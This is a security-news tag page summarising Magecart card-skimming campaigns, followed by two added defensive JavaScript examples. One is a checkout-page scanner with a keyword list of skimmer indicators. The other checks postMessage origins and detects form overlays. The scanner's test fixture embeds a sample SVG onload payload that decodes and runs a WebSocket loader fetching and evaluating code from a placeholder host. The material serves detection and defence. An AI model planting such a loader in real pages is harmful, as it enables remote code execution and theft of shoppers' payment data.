< ciso brief />

All news with the #magecart tag

11 articles

Critical Funnel Builder Flaw Actively Injects Skimmers

⚠️ A critical vulnerability in the Funnel Builder WordPress plugin (versions before 3.15.0.3) is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages. Sansec reports that attackers plant scripts disguised as Google Tag Manager snippets in the plugin's External Scripts setting to load payment skimmers. FunnelKit patched the flaw in 3.15.0.3; site owners should update immediately and inspect every script that loads on the checkout page.

Critical Funnel Builder WordPress Plugin Exploited

⚠️ A critical, unauthenticated vulnerability in the Funnel Builder WordPress plugin (versions before 3.15.0.3) is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages. Attackers modify the plugin's global settings through an exposed checkout endpoint, adding a fake analytics script that opens a WebSocket connection and pulls down a payment-card skimmer. The skimmer harvests card numbers, CVVs, billing details and other customer data; site owners should update to 3.15.0.3 and audit the External Scripts setting for entries they did not add.

Attackers Hide Credit-Card Skimmer in 1×1 SVG Pixel

🔍 Sansec researchers uncovered a campaign that plants a credit-card skimmer in Magento storefronts by hiding it in a 1×1-pixel SVG element with an onload handler. The handler carries the entire payload as a base64 string that is decoded with atob() and executed inline, so no external script request is ever made for a scanner to spot. When shoppers reach checkout, a fake "Secure Checkout" overlay validates card and billing fields in real time and exfiltrates them as XOR-encrypted, base64-encoded JSON; Sansec identified six exfiltration domains and published actionable mitigations.
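
The two injection patterns in the Funnel Builder and SVG-pixel entries above can be caught with a static scan of a saved checkout page. The following is an added example written for this page, not code from Sansec, FunnelKit or any of the articles. It flags (1) inline event handlers (the 1×1 SVG onload trick) that decode a base64 blob with atob() and run it, (2) script tags whose origin is not on the merchant's allowlist (the fake tag-manager script planted through plugin settings), and (3) inline scripts that mention sockets, eval or card fields. The allowlist, the keyword list and the sample page are assumptions constructed for the demo; hostnames under .invalid are placeholders.

```javascript
// Added example (not Sansec's or FunnelKit's code): static scan of checkout HTML
// for skimmer injection indicators. Run under Node on a saved page.

const FIRST_PARTY = 'https://shop.example';              // assumed merchant origin
const ALLOWED_SCRIPT_ORIGINS = new Set([
  FIRST_PARTY,
  'https://js.stripe.com',                               // assumed approved PSP
  'https://www.googletagmanager.com',                    // the real GTM host
]);

// Tokens that have no business in an inline handler or a decoded blob on a checkout page.
const SUSPICIOUS = ['atob(', 'eval(', 'Function(', 'WebSocket', 'fetch(', 'cvv', 'cardnumber'];

const EVENT_ATTR    = /\bon[a-z]+\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;        // onload="..." etc.
const B64_LITERAL   = /["']([A-Za-z0-9+/]{40,}={0,2})["']/g;               // quoted base64 blob
const SCRIPT_SRC    = /<script\b[^>]*\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
const INLINE_SCRIPT = /<script\b(?![^>]*\bsrc\b)[^>]*>([\s\S]*?)<\/script>/gi;

function b64decode(s) {
  try { return Buffer.from(s, 'base64').toString('latin1'); } catch { return ''; }
}

function suspiciousTokens(text) {
  const lower = text.toLowerCase();
  return SUSPICIOUS.filter(t => lower.includes(t.toLowerCase()));
}

function scanCheckoutHtml(html) {
  const findings = [];

  // (1) Inline event handlers: inspect the handler with base64 blobs blanked out
  // (so random base64 characters cannot trip the keyword list), then decode each
  // blob and inspect the plaintext separately.
  for (const m of html.matchAll(EVENT_ATTR)) {
    const handler = m[1] ?? m[2] ?? '';
    const hits = suspiciousTokens(handler.replace(B64_LITERAL, '""'));
    for (const b of handler.matchAll(B64_LITERAL)) {
      hits.push(...suspiciousTokens(b64decode(b[1])).map(t => 'decoded:' + t));
    }
    if (hits.length) findings.push({ kind: 'event-handler', hits, snippet: handler.slice(0, 40) });
  }

  // (2) External scripts from origins the merchant never approved.
  for (const m of html.matchAll(SCRIPT_SRC)) {
    const src = m[1] ?? m[2] ?? '';
    let origin = 'invalid-url';
    try { origin = new URL(src, FIRST_PARTY).origin; } catch {}
    if (!ALLOWED_SCRIPT_ORIGINS.has(origin)) findings.push({ kind: 'external-script', hits: [origin], snippet: src });
  }

  // (3) Inline scripts.
  for (const m of html.matchAll(INLINE_SCRIPT)) {
    const hits = suspiciousTokens(m[1]);
    if (hits.length) findings.push({ kind: 'inline-script', hits, snippet: m[1].trim().slice(0, 40) });
  }
  return findings;
}

// Constructed sample page: a legitimate PSP script, a benign inline snippet, an
// injected lookalike tag-manager script, and a 1x1 SVG whose onload handler decodes
// and runs a WebSocket loader (a constructed second stage, not a real sample).
const STAGE2 = 'new WebSocket("wss://c2.invalid/ws").onmessage = e => eval(e.data)';
const SAMPLE_HTML = `
<script src="https://js.stripe.com/v3/"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://gtm-analytics.invalid/gtm.js"></script>
<svg width="1" height="1" onload="eval(atob('${Buffer.from(STAGE2).toString('base64')}'))"></svg>
<script src="/assets/checkout.js"></script>`;

for (const f of scanCheckoutHtml(SAMPLE_HTML)) {
  console.log(f.kind, f.hits.join(','), '<-', f.snippet);
}
```

On the sample page the scan reports the SVG handler (atob and eval in the handler, eval and WebSocket in the decoded blob) and the unapproved gtm.js origin, and stays silent on the Stripe loader, the first-party script and the dataLayer snippet. The regexes are deliberately simple; a real deployment would run the same checks over a parsed DOM and over every page that carries a payment form, not just one saved copy.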

Claude Code Security and Magecart: Where Tools Stop

🛡️ This report explains why a Magecart skimmer that hid its payload in a favicon's EXIF metadata evades repository-focused scanners. Claude Code Security inspects source code and repository artifacts, so it cannot see scripts injected through third-party CDNs, tag managers or image files that only execute in the shopper's browser. The observed attack used a multi-stage loader that assembled a URL, parsed the binary image metadata and executed the extracted payload at checkout, silently exfiltrating payment data. The piece argues that runtime monitoring and stronger supply-chain governance are necessary complements to static analysis.

Long-running web skimming campaign targets major payments

🔒 Silent Push researchers disclosed a long-running web-skimming campaign, active since January 2022, that targets customers of major payment networks including American Express, Mastercard, Discover, JCB, Diners Club and UnionPay. The attackers serve heavily obfuscated JavaScript from cdn-cookie[.]com to e-commerce sites; the script checks for WordPress's admin bar element (wpadminbar) and removes itself when a logged-in administrator is viewing the page, so site staff never see the injection. The skimmer renders a fake Stripe payment form, harvests card and personal data, exfiltrates it to lasorie[.]com, then cleans up after itself and sets a localStorage flag so the same victim is not hit twice, heightening the risk for enterprise clients of the affected payment providers.

Global Magecart Campaign Targets Six Major Card Networks

🔒 Silent Push has uncovered a long-running Magecart web-skimming campaign, active since around 2022, that loads heavily obfuscated JavaScript from bulletproof hosting and targets six major card networks including American Express, Mastercard and UnionPay. The skimmer runs entirely client-side: it injects an iframe containing a convincingly styled fake payment form, captures cardholder and shipping details, then restores the original form. Silent Push ties parts of the infrastructure to domains hosted by a sanctioned bulletproof-hosting provider and recommends Content Security Policy, PCI DSS adherence, timely CMS and plugin updates, enforced MFA, and testing the checkout in an incognito session (where the skimmer's admin check cannot hide it) to catch stealthy injections.

ThreatsDay: GhostAd, macOS Supply-Chain, Proxy Botnets

🔍 The ThreatsDay bulletin opens 2026 with a cross-section of active campaigns and emerging tactics that emphasize stealth, precision, and financial motive. Highlights include the GhostAd Android adware drain, macOS supply-chain trojans tied to Open VSX extensions, a large non-KYC proxy network (IPCola), and multiple cloud and contract-exploit incidents. The roundup also details arrests, regulatory action, and evolving Magecart and click-fraud toolkits that collectively signal a shift toward low-noise, high-return operations.

Five Major Threats That Reshaped Web Security in 2025

🛡️ Web security in 2025 shifted rapidly as AI-enabled development and adversaries outpaced traditional controls. Natural-language "vibe coding" and compromised AI dev tools produced functional code with exploitable flaws, highlighted by the Base44 authentication bypass and multiple CVEs affecting popular assistants. At the same time, industrial-scale JavaScript injections, advanced Magecart e-skimming, and widespread privacy drift impacted hundreds of thousands of sites and thousands of financial sessions. Defenders moved toward security-first prompting, behavioral monitoring, continuous validation, and AI-aware controls to reduce exposure.

Prison kiosk hack and new PCI DSS limits on Magecart

🔐 In episode 440 Graham Cluley and guest Scott Helme examine an unusual insider exploitation where Romanian prison self‑service web kiosks let inmates access and alter records. They also explore the growing threat of third‑party JavaScript on checkout pages and how the updated PCI DSS aims to curb Magecart‑style skimmers. Plus, the hosts cover automation with Keyboard Maestro and video creation using Screen Studio.

Unmonitored JavaScript: The Holiday Shopping Risk 2025

⚠️ The article argues that unmonitored JavaScript on e-commerce sites is the single biggest holiday security risk: it lets attackers steal payment data in the shopper's browser while server-side defences such as WAFs and intrusion detection systems see nothing. It reviews major 2024 incidents, including the Polyfill.io and Cisco Magecart campaigns, and notes a sharp rise in attacks during peak shopping windows. Recommended mitigations focus on closing the visibility gap with real-time client-side monitoring, maintaining a strict inventory of third-party scripts, and deploying a nonce-based Content Security Policy (starting in report-only mode) rather than loosening directives until injected scripts happen to fit.

Iframe Security Exposed — Payment Checkout Blind Spot

🔒 Payment iframes are no longer a guaranteed sandbox: attackers use pixel-perfect overlays and other injection techniques to steal card data from checkout pages without ever touching the iframe's contents. The article dissects the August 2024 Stripe skimmer campaign, which compromised dozens of merchants and abused a deprecated API to validate stolen cards in real time. It explains why legacy controls such as X-Frame-Options and a basic CSP fail once the host page itself is compromised, and outlines a practical six-step defence combining a strict CSP, real-time DOM monitoring, origin-checked postMessage handling, and the tooling changes required by PCI DSS 4.0.1.
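
Two of the client-side controls in that six-step defence, secure postMessage handling and DOM monitoring for overlays, are shown below as an added example written for this page, not the article's code. The decision logic is written as pure functions so it can be tested outside a browser, with the DOM wiring at the end: (1) the host page accepts postMessage traffic from the payment iframe only when origin, source window and message shape all match; (2) an overlay check flags elements that cover the payment iframe's box, are taken out of normal flow, and can receive pointer input, which is what a pixel-perfect fake form looks like. The PSP origin, message types, alert endpoint and layout data are assumptions constructed for the demo.

```javascript
// Added example (not from the article): origin-checked postMessage acceptance and
// overlay detection over the payment iframe, pure functions plus browser wiring.

const PSP_ORIGIN = 'https://js.stripe.com';                 // assumed iframe origin
const ALLOWED_TYPES = new Set(['token', 'error', 'ready']);  // assumed message types

// expected = { origin, source } where source is iframe.contentWindow.
function acceptPaymentMessage(event, expected) {
  if (event.origin !== expected.origin) return false;        // never accept '*' or skip this check
  if (event.source !== expected.source) return false;        // another frame could share the origin
  const d = event.data;
  if (!d || typeof d !== 'object' || typeof d.type !== 'string') return false;
  return ALLOWED_TYPES.has(d.type);
}

function intersectionArea(a, b) {
  const w = Math.min(a.left + a.width, b.left + b.width) - Math.max(a.left, b.left);
  const h = Math.min(a.top + a.height, b.top + b.height) - Math.max(a.top, b.top);
  return w > 0 && h > 0 ? w * h : 0;
}

// candidates: [{ id, rect, position, pointerEvents }] from getBoundingClientRect()
// and getComputedStyle(). An element counts as an overlay when most of it sits on
// the iframe, it is positioned out of flow, and it can actually receive input.
function findOverlays(iframeRect, candidates) {
  return candidates.filter(c => {
    const area = c.rect.width * c.rect.height;
    if (area === 0 || c.pointerEvents === 'none') return false;
    const covered = intersectionArea(c.rect, iframeRect) / area;
    return covered > 0.5 && (c.position === 'absolute' || c.position === 'fixed');
  });
}

// Constructed layout: the site header, a pointer-transparent spinner, and an
// injected div positioned exactly over the PSP iframe.
const IFRAME_RECT = { top: 100, left: 50, width: 400, height: 200 };
const SAMPLE_ELEMENTS = [
  { id: 'site-header',  rect: { top: 0,   left: 0,   width: 800, height: 60  }, position: 'fixed',    pointerEvents: 'auto' },
  { id: 'spinner',      rect: { top: 150, left: 200, width: 40,  height: 40  }, position: 'absolute', pointerEvents: 'none' },
  { id: 'card-form-v2', rect: { top: 100, left: 50,  width: 400, height: 200 }, position: 'absolute', pointerEvents: 'auto' },
];

// Browser wiring (skipped under Node): re-run the overlay check on every DOM change
// and report hits to an assumed /dom-alert endpoint.
if (typeof document !== 'undefined') {
  const iframe = document.querySelector('iframe[src^="' + PSP_ORIGIN + '"]');
  if (iframe) {
    window.addEventListener('message', e => {
      if (!acceptPaymentMessage(e, { origin: PSP_ORIGIN, source: iframe.contentWindow })) return;
      // handle e.data.type here
    });
    new MutationObserver(() => {
      const candidates = [...document.body.querySelectorAll('*')]
        .filter(el => el !== iframe && !el.contains(iframe))   // ignore the iframe and its wrappers
        .map(el => {
          const cs = getComputedStyle(el);
          return { id: el.id || el.tagName, rect: el.getBoundingClientRect(),
                   position: cs.position, pointerEvents: cs.pointerEvents };
        });
      const hits = findOverlays(iframe.getBoundingClientRect(), candidates);
      if (hits.length) navigator.sendBeacon('/dom-alert', JSON.stringify(hits.map(h => h.id)));
    }).observe(document.body, { childList: true, subtree: true, attributes: true });
  }
}

console.log(findOverlays(IFRAME_RECT, SAMPLE_ELEMENTS).map(e => e.id));   // [ 'card-form-v2' ]
```

The source check matters as much as the origin check: a skimmer can open its own iframe to the same PSP origin and relay messages through it, and only comparing event.source against the expected contentWindow tells the two apart. Legitimate modals that cover the checkout (cookie banners, address pickers) will also trip the overlay check, so keep an allowlist of known ids and treat anything else as an incident.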